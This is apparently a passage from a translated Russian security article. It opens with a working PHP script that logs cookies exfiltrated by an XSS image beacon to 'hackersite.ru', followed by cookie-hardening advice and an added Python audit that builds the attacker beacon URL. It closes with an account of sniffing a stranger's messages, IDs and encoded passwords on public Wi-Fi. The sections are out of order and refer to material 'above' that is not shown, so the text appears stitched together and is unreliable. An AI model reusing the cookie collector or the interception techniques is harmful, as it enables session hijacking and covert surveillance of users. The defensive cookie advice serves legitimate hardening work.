The attacker only needs hosting with PHP support and a script like this (the opening PHP tag was missing from the page):

<?php
// Append the raw query string (the exfiltrated cookies) to a log file.
$uid = urldecode($_SERVER["QUERY_STRING"]);
$fp = fopen("log.txt", "a");
fputs($fp, "$uid\n");
fclose($fp);
?>

All query strings sent to this script are then saved in log.txt. It remains only to replace http://hackersite.ru/xss.jpg in the JavaScript above with the path to this PHP script.


Outcome

I have shown only the simplest way to exploit XSS vulnerabilities. But it proves that a single such vulnerability on a multi-user site can let an attacker use its resources on your behalf. Setting the HttpOnly attribute on the session cookie keeps it out of document.cookie, so this particular exfiltration fails (the injected script can still act on the site from within the page); the Secure attribute keeps the cookie off plain HTTP, where the sniffers described above would see it.
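As an added example tying the two cookie sections together (it is not part of the original article): a Python audit of Set-Cookie headers that reports which cookies the sniffing attacks from the first part of this page could capture (no Secure attribute) and which the document.cookie beacon above could exfiltrate (no HttpOnly attribute), shows the beacon URL that would result, and emits the hardened header. The headers, names and values are constructed for the example.

```python
# Added example (not from the original article): a Set-Cookie audit that
# models the two exposures on this page, a sniffer on plain HTTP and an XSS
# beacon reading document.cookie, and produces the hardened header.
# All headers below are constructed; the attributes are standard ones.
from urllib.parse import quote


def parse_set_cookie(header: str) -> dict:
    """Split a Set-Cookie header into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def exposure(headers):
    """For each cookie, which of the page's attacks can reach it:
    'xss'   - no HttpOnly, so document.cookie (and the Image beacon) sees it
    'sniff' - no Secure, so the browser also sends it over plain HTTP"""
    report = {}
    for header in headers:
        c = parse_set_cookie(header)
        risks = set()
        if "httponly" not in c["attrs"]:
            risks.add("xss")
        if "secure" not in c["attrs"]:
            risks.add("sniff")
        report[c["name"]] = risks
    return report


def document_cookie(headers) -> str:
    """What a script on the page would read from document.cookie."""
    cookies = [parse_set_cookie(h) for h in headers]
    return "; ".join(f"{c['name']}={c['value']}" for c in cookies if "httponly" not in c["attrs"])


def beacon_url(headers, collector="http://hackersite.ru/xss.jpg") -> str:
    """The request the page's Image trick would generate (nothing is sent here).
    quote() with these safe characters approximates JavaScript's encodeURI."""
    return collector + "?" + quote(document_cookie(headers), safe="=;/")


def harden(header: str) -> str:
    """Append the attributes that close both exposures if they are missing."""
    c = parse_set_cookie(header)
    missing = {"httponly": "HttpOnly", "secure": "Secure", "samesite": "SameSite=Lax"}
    extra = [text for attr, text in missing.items() if attr not in c["attrs"]]
    return "; ".join([header.rstrip("; ")] + extra)


# Constructed headers: a bare session cookie, a hash-in-a-cookie like the
# Wireshark walkthrough's test site, and one that is already hardened.
HEADERS = [
    "PHPSESSID=7f3a9c0d; path=/",
    "password=0123abcd; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/",
    "auth=tok_2f1e; Path=/; Secure; HttpOnly; SameSite=Lax",
]

if __name__ == "__main__":
    for name, risks in exposure(HEADERS).items():
        print(f"{name}: {sorted(risks) or 'ok'}")
    print("beacon would send:", beacon_url(HEADERS))
    for h in HEADERS:
        print("hardened:", harden(h))
```

HttpOnly stops the exfiltration shown above, not the XSS itself: the injected script can still issue requests that carry the cookie. Secure stops a passive sniffer, but an SSL Strip attack only needs one plain-HTTP request to start from, so the Secure attribute is worth pairing with HSTS on the site.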

Internet users are so careless that losing confidential data is easy for them. 42.tut ran an experiment to show how many "holes" public Wi-Fi networks have. The conclusion is disappointing: anyone, without special skills or knowledge, can compile a complete dossier on a person using only an open wireless network.

For the experiment we installed several applications. They differ in functionality but share one essence: collecting everything that passes through the network the device is connected to. None of them is positioned as "pirate", "hacker" or illegal software; they can be downloaded from the Web without any trouble. The experiment was carried out in a shopping mall with free Wi-Fi.

Interception

We connect to the Wi-Fi: no password, and the network name contains the word "free". We start scanning, and one of the programs immediately finds 15 devices on the network. For each we see the IP address and MAC address, and for some the device manufacturer: Sony, Samsung, Apple, LG, HTC...

We find the "victim's" laptop among the devices and attach to it; data passing through the network starts appearing on screen. Everything is organized by time, and there is even a built-in viewer for intercepted data.

User identification

We keep watching. An online game has clearly started on the partner's laptop: game commands are constantly sent to the network and information about the battlefield situation comes back. We can see the opponents' nicknames, their levels and much more.

A VKontakte message arrives. In the detailed description of one message we find that each carries a visible user ID. Paste it into a browser and it opens the account of the person who received the message.

Meanwhile the "victim" writes a reply, clearly unaware that we are busy browsing the photos in his account. One of the social-network apps plays a notification sound; we can play the same sound in our player.

Passwords and messages

Photos and sounds are not all that open Wi-Fi can "give away". For example, one of the programs has a separate tab for tracking exactly the correspondence in social networks and instant messengers. Messages are decoded and sorted by the time they were sent.

Showing someone else's correspondence is already beyond good and evil. But it works. As an illustration, a part of the author's own dialogue, caught by the monitoring computer from the "victim" device.

Another program separately stores all cookies and user information, including passwords. Fortunately in encoded form, but it immediately offers to install a utility to decode them.

Conclusions

Almost any information can leak over Wi-Fi. Many public networks have no protection at all, sometimes not even a password. This means that the traffic of colleagues, friends or strangers can be intercepted by anyone.

The most reliable way out is one: do not send any important information over public networks. For example, do not send phone numbers and passwords in messages and do not pay with a bank card away from home. The risk of losing personal data is extremely high.